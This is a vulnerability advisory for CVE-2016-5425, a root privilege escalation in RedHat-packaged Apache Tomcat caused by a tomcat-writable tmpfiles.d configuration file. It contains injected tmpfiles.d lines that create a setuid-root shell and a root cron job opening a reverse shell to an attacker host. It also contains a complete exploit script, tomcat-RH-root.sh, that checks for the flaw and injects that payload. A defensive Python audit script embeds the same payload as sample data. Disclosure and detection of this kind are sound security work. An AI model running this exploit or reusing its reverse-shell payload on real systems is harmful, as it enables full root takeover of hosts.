I. Vulnerability summary
Apache Tomcat on RedHat distributions: local privilege escalation vulnerability (CVE-2016-5425)
II. Background description
Tomcat is a Servlet container developed by the Jakarta project of the Apache Software Foundation. Following the specifications published by Sun Microsystems, it implements support for Servlets and JavaServer Pages (JSP), and it also provides some functions of a web server of its own, such as the Tomcat management and control platform, security realm management, and Tomcat valves.
Official website: http://tomcat.apache.org/
III. Description
The Apache Tomcat packages shipped by RedHat-based distributions, including CentOS, RedHat, Oracle Linux and Fedora, install a tmpfiles.d configuration file with incorrect permissions: the file is readable and writable by the tomcat user. An attacker who has already obtained the privileges of the tomcat user, for example through a vulnerability in a web application, can write to this file and escalate to root, gaining complete control of the system.
IV. Vulnerability description
On RedHat-based distributions, after the tomcat package is installed the tomcat user has write permission on /usr/lib/tmpfiles.d/tomcat.conf, as shown below:
[root@localhost ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 43 May 12 2015 /usr/lib/tmpfiles.d/tomcat.conf
The configuration files in the tmpfiles.d directory are read by systemd-tmpfiles to create, clean up and manage temporary files. Because tomcat.conf is writable by the tomcat user, an attacker running as that user can easily inject malicious entries into it, such as entries that create a setuid-root copy of a shell or drop a reverse-shell cron job. Whenever /usr/bin/systemd-tmpfiles is executed (it runs as root), the injected entries are processed.
On RedHat distributions, systemd-tmpfiles runs at boot through the systemd-tmpfiles-setup.service unit, as shown below:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup.service | grep ExecStart
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depending on the system, systemd-tmpfiles may also be triggered by other services, cron jobs, startup scripts and other means. Another point worth noting is that systemd-tmpfiles does not stop when a configuration file contains a syntax error; it reports the bad line and continues with the remaining entries. An attacker can therefore inject a malicious payload into /usr/lib/tmpfiles.d/tomcat.conf without worrying about breaking the existing entries.
The following PoC lines illustrate this:
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
Injected into tomcat.conf, these lines create a setuid-root copy of the shell and a cron job that spawns a reverse shell: the C line copies /bin/bash to /usr/share/tomcat/rootsh, the z line sets the mode and ownership of that copy to 4770 root:root, and the F line creates /etc/cron.d/tomcatexploit with the quoted content, which crond runs as root every minute. The exact semantics of the C, z and F types are documented in man 5 tmpfiles.d. Note that with mode 4770 and group root the tomcat user has no execute permission on rootsh, so in this PoC it is the reverse shell started by the cron entry that actually yields root. A defender should verify that tomcat.conf is owned by root and is not writable by the tomcat user.
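As an added example (not part of this advisory, of Tomcat or of systemd), the following Python script turns the two observations above, the writable .conf file and the dangerous entry types, into an audit a defender can run on a host. It parses tmpfiles.d lines with shlex (assumed to be close enough to the tmpfiles.d quoting rules), flags entries that set setuid/setgid bits or write into directories such as /etc/cron.d whose contents root executes (that directory list is an assumption), and reports any .conf file whose owner or mode lets a non-root account modify it. The embedded SAMPLE_CONF is constructed from the PoC lines above with a made-up attacker address; run with no arguments, the script audits the real /etc/tmpfiles.d, /run/tmpfiles.d and /usr/lib/tmpfiles.d directories.

```python
#!/usr/bin/env python3
"""Audit tmpfiles.d configuration for the CVE-2016-5425 pattern.

Added example, not code from this advisory, from Tomcat or from systemd. It checks
(1) whether a .conf file is writable by a non-root account and (2) whether any entry
does what the PoC payload does: set setuid bits or drop a file where root executes it.
shlex quoting is assumed to be close enough to tmpfiles.d(5) field quoting.
"""
import os
import shlex
import stat

FIELDS = ("type", "path", "mode", "user", "group", "age", "argument")
CREATING_TYPES = "fFwCLcbp"   # entry types that create/write the file at Path
# Assumed list of directories whose contents root runs on a schedule or at boot.
ROOT_EXEC_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly",
                  "/etc/cron.monthly", "/etc/sudoers.d", "/etc/profile.d",
                  "/etc/systemd/system", "/usr/lib/systemd/system")

# Constructed sample: the stock entry followed by the advisory's three payload lines.
SAMPLE_CONF = """\
# constructed tomcat.conf
d /var/run/tomcat 0755 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/10.0.0.1/9090 0<&1 2>&1 & \\n\\n"
"""


def parse_tmpfiles_line(line):
    """Split a line into the seven tmpfiles.d fields ("-" for omitted ones); None for blank/comment lines."""
    text = line.strip()
    if not text or text.startswith("#"):
        return None
    fields = shlex.split(text)
    if len(fields) < 2:
        raise ValueError("need at least Type and Path: %r" % line)
    fields += ["-"] * (len(FIELDS) - len(fields))
    return dict(zip(FIELDS, fields))


def suspicious_reasons(entry):
    """Why this entry would hand root to whoever can edit the .conf file."""
    reasons = []
    etype = entry["type"][:1]          # drop modifiers such as C+ or f!
    mode = entry["mode"].lstrip("~:")  # ~ = mask, : = apply only on creation
    if mode != "-" and int(mode, 8) & (stat.S_ISUID | stat.S_ISGID):  # ValueError if not octal
        reasons.append("sets setuid/setgid bits (%s) on %s" % (mode, entry["path"]))
    if etype and etype in CREATING_TYPES and any(
            entry["path"].startswith(d + "/") for d in ROOT_EXEC_DIRS):
        reasons.append("writes %s, which root will execute" % entry["path"])
    return reasons


def audit_conf(text):
    """Return [(lineno, reasons)] for every suspicious or unparseable line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        try:
            entry = parse_tmpfiles_line(line)
            reasons = suspicious_reasons(entry) if entry else []
        except ValueError as exc:
            # systemd-tmpfiles reports a bad line and carries on; the audit does the same
            reasons = ["unparseable line (%s)" % exc]
        if reasons:
            findings.append((lineno, reasons))
    return findings


def writable_by_unprivileged(st_mode, st_uid, st_gid):
    """Reasons a file with these stat() values can be rewritten by a non-root account."""
    reasons = []
    if st_uid != 0:
        reasons.append("owned by uid %d" % st_uid)
    if st_mode & stat.S_IWGRP and st_gid != 0:   # the vulnerable tomcat.conf: 0664 root:tomcat
        reasons.append("group-writable by gid %d" % st_gid)
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_system(dirs=("/etc/tmpfiles.d", "/run/tmpfiles.d", "/usr/lib/tmpfiles.d")):
    """Run both checks over every .conf file in the tmpfiles.d directories; [(path, lineno, reasons)]."""
    findings = []
    for directory in dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not name.endswith(".conf") or not os.path.isfile(path):
                continue
            try:
                st = os.stat(path)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError as exc:
                findings.append((path, 0, ["cannot read: %s" % exc]))
                continue
            findings += [(path, 0, [r]) for r in writable_by_unprivileged(st.st_mode, st.st_uid, st.st_gid)]
            findings += [(path, n, r) for n, r in audit_conf(text)]
    return findings


if __name__ == "__main__":
    for path, lineno, reasons in audit_system():
        print("%s:%d: %s" % (path, lineno, "; ".join(reasons)))
```

The file-permission check deliberately treats group-write as a finding only when the group is not root, which is exactly the 0664 root:tomcat case on the vulnerable package; a clean host should produce no output for tomcat.conf.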
V. PoC and local test
-----------[ tomcat-RH-root.sh ]---------
#!/bin/bash
# Run as the tomcat user (e.g. from a shell obtained through a web application bug).
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090
echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e "Discovered by Dawid Golunski\n"
echo "[+] Checking vulnerability"
# Exploitable when the file belongs to group tomcat and the current user can write to it
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep -q ' tomcat ' && [ -w /usr/lib/tmpfiles.d/tomcat.conf ]
if [ $? -ne 0 ]; then
    echo "Not vulnerable or the tomcat installed under a different user than 'tomcat'"
    exit 1
fi
echo -e "\n[+] Your system is vulnerable!"
echo -e "\n[+] Appending data to the /usr/lib/tmpfiles.d/tomcat.conf..."
# C copies /bin/bash to a setuid-root file, z enforces its mode/ownership, F drops a root cron job
cat <<_eof_ >>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
_eof_
echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"
--------------[ _eof_ ]--------------------
Local test: